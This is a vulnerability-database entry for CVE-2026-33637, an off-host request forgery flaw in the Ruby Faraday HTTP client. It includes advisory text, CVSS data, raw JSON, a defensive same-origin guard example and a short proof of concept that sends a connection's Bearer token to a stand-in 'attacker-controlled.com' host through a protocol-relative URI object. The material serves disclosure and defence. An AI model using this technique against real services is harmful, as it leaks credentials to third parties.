Security Vulnerability Report
CVE-2026-33637 CVSS 0.0 NONE

CVE-2026-33637

Published: 2026-05-19 19:16:49
Last Modified: 2026-05-19 21:08:41

Description

Faraday is an HTTP client library abstraction layer that provides a common interface over many adapters. Versions 2.0.0 through 2.14.1 still allow protocol-relative host override when the request target is passed as a URI object (rather than a String) to Faraday::Connection#build_exclusive_url. This bypasses the February 2026 fix for GHSA-33mh-2634-fwr2 and enables off-host request forgery: a request built from a fixed-base Faraday::Connection can be redirected to an attacker-controlled host, forwarding connection-scoped values such as Authorization headers and default query parameters. This issue has been fixed in version 2.14.3.

CVSS Details

CVSS Score
0.0
Severity
NONE
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Faraday >= 2.0.0, <= 2.14.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```ruby
require 'faraday'

# Set up a connection with a fixed base URL and an Authorization header
conn = Faraday.new('https://api.example.com') do |f|
  f.headers['Authorization'] = 'Bearer secret-token'
  f.adapter :net_http
end

# Pass a URI object (not a String) with a protocol-relative host.
# In affected versions this bypasses the GHSA-33mh-2634-fwr2 fix,
# and the request leaves the connection's fixed base host.
malicious_uri = URI.parse('//attacker-controlled.com/log')

# The request goes to https://attacker-controlled.com/log
# carrying the header 'Authorization: Bearer secret-token'
response = conn.get(malicious_uri)
```
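The mechanism behind the report is ordinary RFC 3986 reference resolution: a protocol-relative target has no scheme but does carry an authority, so resolving it against a base keeps the scheme and replaces the host. The following is an added example, not Faraday's code, using only Ruby's stdlib `URI` to show that resolution and a same-origin guard a caller can apply to a request target (String or URI object) before dispatch; `BASE_URL`, `resolve_target`, `enforce_same_origin!` and `off_host?` are assumed names for this illustration.

```ruby
require 'uri'

# Constructed sample base: the origin the connection is supposed to stay pinned to.
BASE_URL = URI.parse('https://api.example.com/v1/')

class OffHostRequest < StandardError; end

# Resolve a request target (String or URI object) against the base with
# URI#merge, which implements RFC 3986 reference resolution. A target such as
# "//other.example/path" has no scheme but does carry an authority, so the
# result keeps the base scheme and takes the target's host: the host override
# described in the advisory text above.
def resolve_target(base, target)
  base.merge(target)
end

# Guard to run before dispatch: accept the target only if the resolved URL is
# still on the base origin (same scheme, host and port). Returns the resolved
# URI, or raises OffHostRequest with the off-origin result for logging.
def enforce_same_origin!(base, target)
  resolved = resolve_target(base, target)
  same_origin = resolved.scheme == base.scheme &&
                resolved.host == base.host &&
                resolved.port == base.port
  unless same_origin
    raise OffHostRequest,
          "target #{target.inspect} resolves to #{resolved} off the base host #{base.host}"
  end
  resolved
end

# Predicate form of the guard, convenient for tests and request auditing.
def off_host?(base, target)
  enforce_same_origin!(base, target)
  false
rescue OffHostRequest
  true
end

if __FILE__ == $PROGRAM_NAME
  ['users', '/v1/users?x=1', URI.parse('//attacker-controlled.com/log'),
   'https://attacker-controlled.com/x', 'http://api.example.com/v1/users'].each do |t|
    puts "#{t.inspect} -> #{resolve_target(BASE_URL, t)} off_host=#{off_host?(BASE_URL, t)}"
  end
end
```

The guard also rejects a scheme downgrade (an `http://` target against an `https://` base), since that likewise moves the request off the pinned origin.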

References

- https://github.com/advisories/GHSA-33mh-2634-fwr2
- https://github.com/lostisland/faraday/security/advisories/GHSA-5rv5-xj5j-3484

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-33637",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-19T19:16:49.113",
    "lastModified": "2026-05-19T21:08:41.030",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Faraday is an HTTP client library abstraction layer that provides a common interface over many adapters. Versions 2.0.0 through 2.14.1 still allow protocol-relative host override when the request target is passed as a URI object (rather than a String) to Faraday::Connection#build_exclusive_url. This bypasses the February 2026 fix for GHSA-33mh-2634-fwr2 and enables off-host request forgery: a request built from a fixed-base Faraday::Connection can be redirected to an attacker-controlled host, forwarding connection-scoped values such as Authorization headers and default query parameters. This issue has been fixed in version 2.14.3."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N",
            "baseScore": 0.0,
            "baseSeverity": "NONE",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 0.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-918"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/advisories/GHSA-33mh-2634-fwr2", "source": "[email protected]"},
      {"url": "https://github.com/lostisland/faraday/security/advisories/GHSA-5rv5-xj5j-3484", "source": "[email protected]"},
      {"url": "https://github.com/lostisland/faraday/security/advisories/GHSA-5rv5-xj5j-3484", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}
    ]
  }
}
```